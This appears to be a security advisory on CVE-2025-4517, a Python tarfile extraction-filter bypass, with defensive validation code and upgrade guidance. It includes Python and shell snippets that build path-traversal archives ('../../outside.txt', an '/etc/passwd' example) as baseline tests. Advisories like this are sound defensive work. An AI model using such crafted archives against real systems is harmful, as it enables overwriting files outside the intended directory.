CVE-2025-4517 - Arbitrary Filesystem Write via Python `tarfile` Extraction with `filter="data"`

A new vulnerability, CVE-2025-4517, has been discovered in Python’s popular tarfile module. This issue allows attackers to write arbitrary files anywhere on your filesystem if you use untrusted tar archives with either TarFile.extractall() or TarFile.extract() and the filter="data" (or filter="tar") parameter.

The flaw arises because, while filters like "data" are supposed to protect you by blocking dangerous members inside the tar archive (such as device files, absolute paths, or links that point outside the destination), their checks can be bypassed. This means that, with a specially crafted tar archive, files can land outside your intended extraction folder.

For context, see the Python documentation on extraction filters. In this post, we’ll break down what’s happening, show sample code, and detail what you need to watch out for.

You are affected if you extract untrusted archives and pass filter="data" or filter="tar" (or rely on the new default, explained below).

New in Python 3.14: The default value for the filter= parameter is now "data" instead of "no filtering". If you upgraded and now use the new default, you are at risk.
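To see which behaviour applies when filter= is omitted, a small check like the following can help. It is a minimal sketch: the helper names are hypothetical, the version cut-off simply restates the 3.14 default change described above, and it does not account for code that overrides TarFile.extraction_filter on a subclass.

```python
import sys
import tarfile

def default_extraction_filter_name(version_info=sys.version_info):
    """Return the filter assumed to apply when filter= is omitted (a sketch)."""
    # Assumption: mirrors the documented default change in Python 3.14.
    if tuple(version_info[:2]) >= (3, 14):
        return "data"
    return "fully_trusted"

def has_extraction_filters():
    """Return True if this interpreter exposes the extraction filter API."""
    # The named filters are module-level functions where the feature exists.
    return hasattr(tarfile, "data_filter")

if __name__ == "__main__":
    print("default filter:", default_extraction_filter_name())
    print("filters available:", has_extraction_filters())
```

Passing filter= explicitly at every call site avoids depending on the interpreter default at all.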

> Note: This vulnerability is less serious for installing source distributions, because in that context code execution is already possible. But if you’re programmatically extracting arbitrary tars from users, automation, or uploads, you’re vulnerable.

How Does the Exploit Work?

Let’s look at what goes wrong. The classic tar attack uses a member whose path “escapes” upward in the folder tree, like this:
../../../../etc/passwd
If not properly checked, extracting this file will overwrite /etc/passwd or anything else outside your intended target.

The "data" and "tar" filters are intended to stop exactly this, and they do reject a plain name like the one above. The flaw is that the check can be bypassed by a more carefully crafted archive (the upstream fix notes mention crafted symlinks and hard links), so the final write still resolves to a location outside the destination.

Suppose you have code like this:

import tarfile

with tarfile.open('archive.tar', 'r') as tar:
    # filter="data" is the new recommended/safe default, right? (not anymore!)
    tar.extractall(path="safe_folder", filter="data")

On an affected Python version, a crafted archive.tar can get past the filter and cause this call to write into directories outside safe_folder.

Via Python

import io
import tarfile

# Build an archive whose only member has a name that climbs out of the target
with tarfile.open('malicious.tar', 'w') as tar:
    data = b"This should not be here!"
    info = tarfile.TarInfo("../../outside.txt")
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))

Or on the shell

echo "Evil!" > evil.txt
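tar cvf malicious.tar --transform='s/^/..\/..\/..\/..\//' evil.txt

Extracted with no filter at all, the Python-built archive writes outside.txt two directories above "safe_folder", and the shell-built one writes evil.txt four directories above it. With filter="data" these plain names are rejected, so treat them as a baseline test: the archives that trigger CVE-2025-4517 need additional crafting to slip past the filter.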
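To check how your own interpreter treats the plain "../" archive, the sketch below builds it in memory and extracts it with filter="data" inside a throwaway directory. The function names are hypothetical, and it assumes a Python version that supports extraction filters. It only exercises the naive case; it is not a reproduction of CVE-2025-4517.

```python
import io
import os
import tarfile
import tempfile

def build_naive_traversal_archive():
    """Build an in-memory tar with a single '../../outside.txt' member."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w") as tar:
        data = b"This should not be here!"
        info = tarfile.TarInfo("../../outside.txt")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    buffer.seek(0)
    return buffer

def naive_traversal_is_rejected():
    """Return True if filter='data' refuses the plain '../' member."""
    with tempfile.TemporaryDirectory() as root:
        # Nest the destination so that even an escaped write stays inside root.
        dest = os.path.join(root, "a", "b", "safe_folder")
        os.makedirs(dest)
        with tarfile.open(fileobj=build_naive_traversal_archive(), mode="r") as tar:
            try:
                tar.extractall(path=dest, filter="data")
            except tarfile.FilterError:
                return True
        return False

if __name__ == "__main__":
    if hasattr(tarfile, "data_filter"):
        print("naive traversal rejected:", naive_traversal_is_rejected())
    else:
        print("this interpreter has no extraction filters")
```

A rejection here only tells you the basic name check works. It says nothing about whether the interpreter is patched against the more elaborate bypass.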

Why Should You Worry?

- Arbitrary Filesystem Write: This means attackers can overwrite sensitive files — SSH keys, system configs, anything!
- Privilege Escalation: If your Python script runs as a privileged user (e.g. root), the impact can be catastrophic.
- Widespread Pattern: This “extract and forget” pattern exists in many codebases, and "data" was meant to be a safe default.

1. Always validate archive contents yourself or use hardened extraction

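import os
import tarfile

def is_within_directory(directory, target):
    # Compare fully resolved paths so ".." segments and existing symlinks count
    real_directory = os.path.realpath(directory)
    real_target = os.path.realpath(target)
    return os.path.commonpath([real_directory, real_target]) == real_directory

with tarfile.open('archive.tar', 'r') as tar:
    for member in tar.getmembers():
        # Refuse links outright: a name-only check cannot see where they lead
        if member.issym() or member.islnk():
            raise Exception("Link member found in Tar File")
        member_path = os.path.join("safe_folder", member.name)
        if not is_within_directory("safe_folder", member_path):
            raise Exception("Attempted Path Traversal in Tar File")
    tar.extractall("safe_folder", filter="data")

This will at least *detect* plain traversal names and refuse link members before anything is written. It is a stopgap that is stricter than the filter itself (archives that legitimately contain links will be rejected), not a substitute for a patched Python.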
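If you would rather collect every problem than stop at the first one, the same idea can be written as a reporting pass. This is a minimal sketch under stated assumptions: find_unsafe_members and the demo archive are hypothetical names, the policy (no links, no special files, no escaping paths) is a deliberately strict choice, and the path comparison assumes a POSIX-style filesystem.

```python
import io
import os
import tarfile

def find_unsafe_members(tar, destination):
    """Return (name, reason) pairs for members this sketch would refuse."""
    real_dest = os.path.realpath(destination)
    problems = []
    for member in tar.getmembers():
        if member.issym() or member.islnk():
            problems.append((member.name, "link member"))
            continue
        if not (member.isfile() or member.isdir()):
            problems.append((member.name, "special file"))
            continue
        # Resolve the would-be target and compare it with the destination.
        target = os.path.realpath(os.path.join(real_dest, member.name))
        if os.path.commonpath([real_dest, target]) != real_dest:
            problems.append((member.name, "escapes destination"))
    return problems

def build_demo_archive():
    """In-memory archive with one good file, one '../' name, one symlink."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w") as tar:
        for name in ("ok.txt", "../../outside.txt"):
            info = tarfile.TarInfo(name)
            info.size = 2
            tar.addfile(info, io.BytesIO(b"hi"))
        link = tarfile.TarInfo("link")
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc"
        tar.addfile(link)
    buffer.seek(0)
    return buffer

if __name__ == "__main__":
    with tarfile.open(fileobj=build_demo_archive(), mode="r") as tar:
        for name, reason in find_unsafe_members(tar, "safe_folder"):
            print(name, "->", reason)
```

Extract only when the returned list is empty, and still pass filter="data" so the built-in checks run as a second layer.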

2. Track Library Updates

- Reported bug and Python security release: follow the corresponding issue on the CPython GitHub tracker
- Follow Python Security Advisories

3. Upgrade Once Patched

Check Python's release notes for your branch and upgrade to a release that contains the fix. The changelog entry to look for describes tarfile extraction filter bypasses via crafted symlinks and hard links. Until you have upgraded, never use extract()/extractall() on untrusted data.
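A deployment check can flag interpreters that are older than the fixed patch level for their branch. The sketch below is hypothetical throughout: the function name is invented, and the patch levels in the table are an assumption based on the early June 2025 releases that must be confirmed against the official release notes before use. Distribution packages may also backport fixes without changing the version number, which this check cannot see.

```python
import sys

# ASSUMPTION: minimum fixed patch level per branch. Verify every entry
# against the official Python release notes before relying on it.
ASSUMED_FIXED_PATCH = {
    (3, 9): 23,
    (3, 10): 18,
    (3, 11): 13,
    (3, 12): 11,
    (3, 13): 4,
}

def looks_patched(version_info=sys.version_info, fixed=ASSUMED_FIXED_PATCH):
    """Return True or False for known branches, None when the branch is unknown."""
    branch = (version_info[0], version_info[1])
    if branch not in fixed:
        return None
    return version_info[2] >= fixed[branch]

if __name__ == "__main__":
    status = looks_patched()
    if status is None:
        print("branch not in table; check the release notes manually")
    elif status:
        print("interpreter is at or above the assumed fixed patch level")
    else:
        print("interpreter is older than the assumed fixed patch level")
```

Returning None for unknown branches is deliberate: it forces a manual look instead of silently reporting a newer branch as safe or unsafe.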

References

- Python tarfile extraction filter documentation
- Python bug tracker
- NIST NVD Entry for CVE-2025-4517 (if/when published)

Conclusion

CVE-2025-4517 exposes Python’s tarfile users to dangerous filesystem writes even when "safe" extraction filters (filter="data" / filter="tar") are used. Until you are running a fixed Python release, always validate tar members for path traversal and link tricks, and never, ever process untrusted tar files directly.

Stay safe, audit your tar extraction code, and share this advisory with any Python developers you know!

Timeline

Published on: 06/03/2025 13:15:20 UTC
Last modified on: 06/05/2025 14:15:33 UTC